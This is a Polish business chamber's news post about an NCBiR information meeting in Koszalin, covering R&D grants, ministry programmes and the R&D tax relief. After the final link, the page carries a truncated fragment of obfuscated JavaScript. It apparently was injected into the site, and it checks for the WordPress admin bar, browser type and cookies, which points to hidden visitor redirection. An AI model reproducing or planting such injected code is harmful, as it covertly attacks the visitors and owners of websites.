Relacja ze spotkania z ekspertami NCBiR | Północna Izba Gospodarcza w Koszalinie

W środę 29 września w Koszalińskim City Boxie odbyło się spotkanie informacyjne z ekspertami z Narodowego Centrum Badań i Rozwoju.

W pierwszej części zaprezentowano informacje dotyczące dotacji na Badania+Rozwój oferowanych przez Narodowe Centrum Badań i Rozwoju. Dodatkowo przedstawiono kilka projektów, które zostały stworzone dzięki współpracy z NCBiR w tym mi.in UnitDoseOne – zautomatyzowana apteka szpitalna (porcjowanie odpowiednich dawek komputerowo i wydawanie w indywidualnych saszetkach).

Materiały do pobrania: prezentacja NCBR

W drugiej części spotkania Pani Monika Jasińska z firmy EkoWodrol z Koszalina opowiedziała jak z praktycznego punktu wyglądało ich przystąpienie do konkursu oraz realizacja założonych we wniosku zadań.

Eksperci przekonują, że procedura przystąpienia do konkursu jest łatwa i nie trzeba korzystać z usług firm zewnętrznych.

Dokumenty testowe można utworzyć w generatorze wniosków na stronie: lsi.ncbr.gov.pl 
Wniosek testowy nie jest widoczny dla pracownikó NCBiR.

Dodatkowo na spotkaniu zaprezentowano działania skierowane do przedsiębiorców realizowanych przez Ministerstwo Nauki i Szkolnictwa Wyższego w tym dwa programy:

  1. Top100 Innowatorzy Gospodarki – wzmocnienie kompetencji stażystów tj. pracowników przedsiębiorstw lub osób współpracujących z tymi przedsiębiorstwami, w zakresie zarządzania badaniami naukowymi oraz komercjalizacji wyników prac B+R – program uruchomiony w czerwcu 2018r.,trwa nabór ciągły wniosków;
  2. Doktorat wdrożeniowy – wprowadzenie możliwości kształcenia uczestnika studiów doktoranckich we współpracy z zatrudniającym go przedsiębiorcą (lub in.podmiotem) – II edycja programu uruchomiona w maju 2018r.

Materiały do pobrania: prezentacja programów MNISW

Warto podkreślić, że od 2018 roku ulga podatkowa na badania i rozwój wynosi do 100%.

Na koniec spotkania zaprezentowano ofertę Lokalnego Punktu Informacyjnego Funduszy Europejskich w Koszalinie (ul. Monete Cassino 2) https://www.funduszeeuropejskie.gov.pl/strony/o-funduszach/punkty/lokalny-punkt-informacyjny-funduszy-europejskich-w-koszalinie/.

Więcej informacji o działalności Narodowego Centrum Badań i Rozwoju pod adresem https://www.ncbr.gov.pl/ 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m